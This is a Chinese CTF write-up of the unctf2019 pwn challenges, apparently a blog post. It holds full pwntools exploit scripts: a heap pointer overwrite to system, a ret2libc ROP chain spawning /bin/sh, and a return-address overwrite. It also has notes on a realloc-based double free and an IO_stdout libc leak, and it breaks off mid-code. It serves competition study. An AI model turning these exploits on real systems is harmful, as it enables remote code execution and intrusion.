unctf2019 pwn部分题解
babyheap
easy,不讲了
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Target selection: a non-zero ``local`` runs the binary under pwntools'
# ``process``; otherwise the script connects to ``host``:``port``.
local = 1
host = "127.0.0.1"
port = 10000
context.log_level = "debug"
exe = "/tmp/tmp.spk5nTEvta/1910245db1406d3eedd"
context.binary = exe
elf = ELF(exe)
# ``elf.libc`` is the libc the local loader would use for ``exe``.
libc = elf.libc
# don't forget to change it
io = process(exe) if local else remote(host, port)
# Thin I/O wrappers around the global ``io`` tube.  Every sender coerces
# its payload with ``str`` so ints and other objects can be passed directly.


def s(data):
    """Send ``str(data)`` without a trailing newline."""
    return io.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` to appear in the output, then send ``str(data)``."""
    return io.sendafter(str(delim), str(data))


def sl(data):
    """Send ``str(data)`` followed by a newline."""
    return io.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``str(data)`` plus a newline."""
    return io.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes (default 4096)."""
    return io.recv(numb)


def ru(delim, drop=True):
    """Receive up to ``delim``; the delimiter itself is dropped by default."""
    return io.recvuntil(delim, drop)


def uu32(data):
    """Unpack ``data`` as a little-endian u32, zero-padding it to 4 bytes."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack ``data`` as a little-endian u64, zero-padding it to 8 bytes."""
    return u64(data.ljust(8, '\x00'))


def lg(name, data):
    """Log ``data`` in hex under the label ``name`` through ``io.success``."""
    suffix = ": 0x%x" % data
    return io.success(name + suffix)
# break on aim addr
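def debug(addr, PIE=True):
    """Attach gdb to the global ``io`` process with a breakpoint at ``addr``.

    Args:
        addr: breakpoint address.  With ``PIE=True`` it is an offset that is
            added to the text base; otherwise it is used as an absolute address.
        PIE: when True, read the text base from ``pmap`` of ``io.pid``.

    Raises:
        IndexError / ValueError if ``pmap`` prints no mapping line or its
        first column is not a hex address.
    """
    import subprocess  # local import: keeps the module header untouched

    if PIE:
        # Run pmap without a shell and parse it here instead of piping through
        # awk.  Line 0 is the "<pid>: <cmdline>" header; line 1 is the lowest
        # mapping, whose first column is taken as the text base (same choice
        # as the original ``readlines()[1]``).  check_output also closes the
        # pipe, which the original os.popen() call never did.
        pmap_out = subprocess.check_output(["pmap", str(io.pid)])
        text_base = int(pmap_out.splitlines()[1].split()[0], 16)
        addr += text_base
    gdb.attach(io, "b *{}".format(hex(addr)))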
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
def c(idx):
    """Answer the "Your choice: " menu prompt with option ``idx``."""
    choice = str(idx)
    sla("Your choice: ", choice)
def new(content):
    """Menu option 1: allocate a chunk and fill it with ``content``."""
    c(1)
    prompt = "Plz input content: "
    sa(prompt, content)
def edit(idx, size, content):
    """Menu option 2: rewrite chunk ``idx`` with ``size`` bytes of ``content``.

    The index and size prompts are answered line by line; the content is
    sent raw (no trailing newline) after its prompt.
    """
    c(2)
    for prompt, value in (("Plz input index: ", idx), ("Plz input size: ", size)):
        sla(prompt, str(value))
    sa("Plz input content: ", content)
def show(idx):
    """Menu option 3: print chunk ``idx``."""
    c(3)
    index = str(idx)
    sla("Plz input index: ", index)
def free(idx):
    """Menu option 4: release chunk ``idx``."""
    c(4)
    index = str(idx)
    sla("Plz input index: ", index)
def exp():
    """Run the babyheap interaction from the write-up.

    Step 1 reads a ``puts`` pointer back through ``show(0)`` and rebases
    ``libc`` on it.  Step 2 writes a second chunk whose first 0x18 bytes hold
    a command string and whose next 8 bytes hold ``system``, then shows it.
    """
    filler = "a" * 0x10

    # --- step 1: read a libc pointer out of chunk 0 ---
    new(filler)
    edit(0, 0x18, "a" * 0x18)
    show(0)
    # The 0x18 bytes of filler come back first; the pointer follows as 6 bytes.
    r(0x18)
    puts_addr = uu64(r(6))
    lg("addr", puts_addr)
    libc.address = puts_addr - libc.symbols["puts"]

    # --- step 2: build and write the second chunk ---
    new(filler)
    cmd = "/bin/sh;#\x00"
    # Pad the command to 0x18 bytes with "a" and append the system address.
    buf = cmd + "a" * (0x18 - len(cmd)) + p64(libc.symbols["system"])
    edit(1, 0x20, buf)
    show(1)
    # free(0) was left disabled in the original script.
if __name__ == "__main__":
    # Run the scripted interaction, then hand the tube over to the user.
    exp()
    io.interactive()
babyrop
简单
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
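# Target selection: a non-zero ``local`` runs the binary under pwntools'
# ``process``; otherwise the script connects to ``host``:``port``.
local = 1
host = "192.25.1.3"
port = 9999
context.log_level = "debug"
exe = "./1910245db1406dc99ea"
context.binary = exe
elf = ELF(exe)
# don't forget to change it
#
# The original assigned the challenge-provided libc and then overwrote it
# with ``elf.libc`` on the very next line, so the remote branch resolved
# symbol offsets against the local machine's libc.  Pick the libc together
# with the connection: ``elf.libc`` for the local process, the shipped
# ``libc6_2.23-0ubuntu3_i386.so`` for the remote service.
if local:
    io = process(exe)
    libc = elf.libc
else:
    io = remote(host, port)
    libc = ELF("./libc6_2.23-0ubuntu3_i386.so")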
# Thin I/O wrappers around the global ``io`` tube.  Every sender coerces
# its payload with ``str`` so ints and other objects can be passed directly.


def s(data):
    """Send ``str(data)`` without a trailing newline."""
    return io.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` to appear in the output, then send ``str(data)``."""
    return io.sendafter(str(delim), str(data))


def sl(data):
    """Send ``str(data)`` followed by a newline."""
    return io.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``str(data)`` plus a newline."""
    return io.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes (default 4096)."""
    return io.recv(numb)


def ru(delim, drop=True):
    """Receive up to ``delim``; the delimiter itself is dropped by default."""
    return io.recvuntil(delim, drop)


def uu32(data):
    """Unpack ``data`` as a little-endian u32, zero-padding it to 4 bytes."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack ``data`` as a little-endian u64, zero-padding it to 8 bytes."""
    return u64(data.ljust(8, '\x00'))


def lg(name, data):
    """Log ``data`` in hex under the label ``name`` through ``io.success``."""
    suffix = ": 0x%x" % data
    return io.success(name + suffix)
# break on aim addr
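def debug(addr, PIE=True):
    """Attach gdb to the global ``io`` process with a breakpoint at ``addr``.

    Args:
        addr: breakpoint address.  With ``PIE=True`` it is an offset that is
            added to the text base; otherwise it is used as an absolute address.
        PIE: when True, read the text base from ``pmap`` of ``io.pid``.

    Raises:
        IndexError / ValueError if ``pmap`` prints no mapping line or its
        first column is not a hex address.
    """
    import subprocess  # local import: keeps the module header untouched

    if PIE:
        # Run pmap without a shell and parse it here instead of piping through
        # awk.  Line 0 is the "<pid>: <cmdline>" header; line 1 is the lowest
        # mapping, whose first column is taken as the text base (same choice
        # as the original ``readlines()[1]``).  check_output also closes the
        # pipe, which the original os.popen() call never did.
        pmap_out = subprocess.check_output(["pmap", str(io.pid)])
        text_base = int(pmap_out.splitlines()[1].split()[0], 16)
        addr += text_base
    gdb.attach(io, "b *{}".format(hex(addr)))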
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Full RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
def exp():
    """Run the babyrop interaction from the write-up.

    Three lines are sent: a first answer ending in the constant 0x66666666,
    a second that makes the program print ``__libc_start_main``'s GOT entry
    (used to rebase ``libc``), and a third built from the rebased addresses.
    """
    pad_20 = "a" * 0x20
    pad_14 = "a" * 0x14

    # First prompt.
    stage1 = flat([pad_20, p32(0x66666666)])
    sl(stage1)

    # Second prompt: puts@plt, a fixed return address, and the GOT slot to print.
    stage2 = flat([
        pad_14,
        elf.plt["puts"],
        p32(0x804853d),
        elf.got["__libc_start_main"],
    ])
    ru("What is your name?")
    r(1)
    sl(stage2)

    # The program echoes the 4-byte GOT entry; rebase libc on it.
    __libc_start_main = uu32(r(4))
    lg("__libc_start_main", __libc_start_main)
    libc.address = __libc_start_main - libc.symbols["__libc_start_main"]
    lg("libc_addr", libc.address)
    lg("system", libc.symbols["system"])
    bin_sh = next(libc.search("/bin/sh"))
    lg("bin_sh", bin_sh)

    # Third prompt: same layout, now using the rebased libc addresses.
    stage3 = flat([
        pad_14,
        elf.plt["puts"],
        libc.symbols["system"],
        elf.got["__libc_start_main"],
        bin_sh,
    ])
    sla("What is your name?\n", stage3)
if __name__ == "__main__":
    # Run the scripted interaction, then hand the tube over to the user.
    exp()
    io.interactive()
soeasypwn
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
# Target selection: ``local`` runs the binary under pwntools' ``process``;
# otherwise the script connects to ``host``:``port``.
local = True
# Set up pwntools for the correct architecture
exe = "./pwn"
elf = context.binary = ELF(exe)
host = "101.71.29.5"
port = 10000
# don't forget to change it
context.log_level = "debug"
# ``elf.libc`` is the libc the local loader would use for ``exe``.
libc = elf.libc
io = process(exe) if local else remote(host, port)
# Thin I/O wrappers around the global ``io`` tube.  Every sender coerces
# its payload with ``str`` so ints and other objects can be passed directly.
# Note that ``r`` here carries a 1-second receive timeout, unlike the other
# scripts in this write-up.


def s(data):
    """Send ``str(data)`` without a trailing newline."""
    return io.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` to appear in the output, then send ``str(data)``."""
    return io.sendafter(str(delim), str(data))


def sl(data):
    """Send ``str(data)`` followed by a newline."""
    return io.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``str(data)`` plus a newline."""
    return io.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes, giving up after one second."""
    return io.recv(numb, timeout=1)


def ru(delim, drop=True):
    """Receive up to ``delim``; the delimiter itself is dropped by default."""
    return io.recvuntil(delim, drop)


def uu32(data):
    """Unpack ``data`` as a little-endian u32, zero-padding it to 4 bytes."""
    return u32(data.ljust(4, '\x00'))


def uu64(data):
    """Unpack ``data`` as a little-endian u64, zero-padding it to 8 bytes."""
    return u64(data.ljust(8, '\x00'))


def lg(name, data):
    """Log ``data`` in hex under the label ``name`` through ``io.success``."""
    suffix = ": 0x%x" % data
    return io.success(name + suffix)
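def debug(addr, PIE=True):
    """Attach gdb to the global ``io`` process with a breakpoint at ``addr``.

    Args:
        addr: breakpoint address.  With ``PIE=True`` it is an offset that is
            added to the text base; otherwise it is used as an absolute address.
        PIE: when True, read the text base from ``pmap`` of ``io.pid``.

    Raises:
        IndexError / ValueError if ``pmap`` prints no mapping line or its
        first column is not a hex address.
    """
    import subprocess  # local import: keeps the module header untouched

    if PIE:
        # Run pmap without a shell and parse it here instead of piping through
        # awk.  Line 0 is the "<pid>: <cmdline>" header; line 1 is the lowest
        # mapping, whose first column is taken as the text base (same choice
        # as the original ``readlines()[1]``).  check_output also closes the
        # pipe, which the original os.popen() call never did.
        pmap_out = subprocess.check_output(["pmap", str(io.pid)])
        text_base = int(pmap_out.splitlines()[1].split()[0], 16)
        addr += text_base
    gdb.attach(io, "b *{}".format(hex(addr)))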
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
def exp():
    """Run the soeasypwn interaction from the write-up.

    The program prints a 5-digit decimal value after "Welcome our the ";
    the script appends the fixed hex suffix 19CD to it, sends the result in
    the name answer, picks option ``\\x00`` at the menu, and drains output.
    """
    ru("Welcome our the ")
    leak = int(r(5), 10)
    lg("leak", leak)
    # debug(0x902)

    # Equivalent to int(hex(leak) + "19CD", 16): the leaked value supplies
    # the upper hex digits and 19CD the lower four.
    addr = int("{:x}19CD".format(leak), 16)
    lg("addr", addr)
    # gdb.attach(io)

    name = "a" * 0xc + p32(addr) + "\x00"
    sa("So, Can you tell me your name?", name)
    sa("(1.hello|2.byebye):", "\x00")

    # Two receives (each with the 1-second timeout from ``r``) to drain output.
    for _ in range(2):
        r()
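if __name__ == "__main__":
    # Retry the interaction until it completes.  A failed attempt closes the
    # tube and opens a fresh one.  The original always re-launched a local
    # ``process`` here even when ``local`` was False, diverging from the
    # module-level setup; reconnect the same way that setup did, and record
    # the failure instead of discarding the exception silently.
    while True:
        try:
            exp()
            io.interactive()
            break
        except Exception as e:
            log.info("attempt failed, retrying: %r", e)
            io.close()
            io = process(exe) if local else remote(host, port)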
这里有个小细节：r() 要调用两次。
Box
漏洞点
数组index是可以输入负数的,就是不会利用,后面看了萝卜师傅的wp才知道可以直接改IO_stdout
我是傻逼!这都想不到
然后有个double free,新点记录下
- size == 0 ,这个时候等同于free
- realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
- malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
- malloc_usable_size(realloc_ptr) < size, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
所以利用这个点第一次可以用普通的
- free(ptr)
- realloc(ptr,0)
这就是double free
漏洞利用
- 利用IO_stdout泄露libc地址
- 利用double free改realloc为one_gadget
准备工作
def c(idx):
    """Answer the "Your Choice: " menu prompt with option ``idx``."""
    choice = str(idx)
    sla("Your Choice: ", choice)
def new(idx, size):
c(1)
sla("Box ID: ", str(idx))
sla(